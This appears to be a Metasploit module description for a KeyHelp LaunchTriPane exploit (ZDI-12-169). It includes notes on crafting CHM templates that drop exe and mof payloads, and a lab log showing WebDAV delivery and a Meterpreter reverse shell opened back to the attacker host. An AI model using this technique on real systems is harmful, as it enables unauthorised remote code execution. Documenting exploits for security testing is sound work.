Added module for ZDI-12-169

[jvazquez-r7]

• The CHM templates are generated from scratch. Used HTML Help Workshop, and then an hex editor to modify the listing chunks to allow embedding of arbitrary contents. Basically, disallow compression for the chunk containing the user controlled contents.
• The CHM templates land exe and mof files with fixed names... seems like hh is doing some additional check, open source chmlib allows to modify the file name just by changing the listing chunks.
• Its not using js obfuscation because of the setTimeout
• Tested successfully on Windows XP SP3

msf  exploit(keyhelp_launchtripane_exec) > [*] Using URL: http://0.0.0.0:80/
[*]  Local IP: http://192.168.1.128:80/
[*] Server started.
[*] 192.168.1.147    keyhelp_launchtripane_exec - Request for "/" does not contain a sub-directory, redirecting to /yzYGN8iAh/ ...
[*] 192.168.1.147    keyhelp_launchtripane_exec - Responding to GET request /yzYGN8iAh/
[*] 192.168.1.147    keyhelp_launchtripane_exec - Using \\\\192.168.1.128\\yzYGN8iAh\\wUmNsBV.chm for payload...
[*] 192.168.1.147    keyhelp_launchtripane_exec - Using \\\\192.168.1.128\\yzYGN8iAh\\OZHfruA.chm for the mof file...
[*] 192.168.1.147    keyhelp_launchtripane_exec - Sending HTML page
[*] 192.168.1.147    keyhelp_launchtripane_exec - Request for "/" does not contain a sub-directory, redirecting to /tauGn6IczbIrU/ ...
[*] 192.168.1.147    keyhelp_launchtripane_exec - Responding to WebDAV OPTIONS request
[*] 192.168.1.147    keyhelp_launchtripane_exec - Request for "/yzYGN8iAh" does not contain a sub-directory, redirecting to /yzYGN8iAh/ ...
[*] 192.168.1.147    keyhelp_launchtripane_exec - Received WebDAV PROPFIND request
[*] 192.168.1.147    keyhelp_launchtripane_exec - Sending directory multistatus for /yzYGN8iAh/ ...
[*] 192.168.1.147    keyhelp_launchtripane_exec - Received WebDAV PROPFIND request
[*] 192.168.1.147    keyhelp_launchtripane_exec - Sending CHM multistatus for /yzYGN8iAh/wUmNsBV.chm ...
[*] 192.168.1.147    keyhelp_launchtripane_exec - Responding to GET request /yzYGN8iAh/wUmNsBV.chm
[*] 192.168.1.147    keyhelp_launchtripane_exec - Sending CHM with payload
[*] 192.168.1.147    keyhelp_launchtripane_exec - Received WebDAV PROPFIND request
[*] 192.168.1.147    keyhelp_launchtripane_exec - Sending CHM multistatus for /yzYGN8iAh/OZHfruA.chm ...
[*] 192.168.1.147    keyhelp_launchtripane_exec - Responding to GET request /yzYGN8iAh/OZHfruA.chm
[*] 192.168.1.147    keyhelp_launchtripane_exec - Sending CHM with mof
[*] Sending stage (752128 bytes) to 192.168.1.147
[*] Meterpreter session 1 opened (192.168.1.128:4444 -> 192.168.1.147:2594) at 2012-10-10 19:13:36 +0200

msf  exploit(keyhelp_launchtripane_exec) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.147 - Meterpreter session 1 closed.  Reason: User exit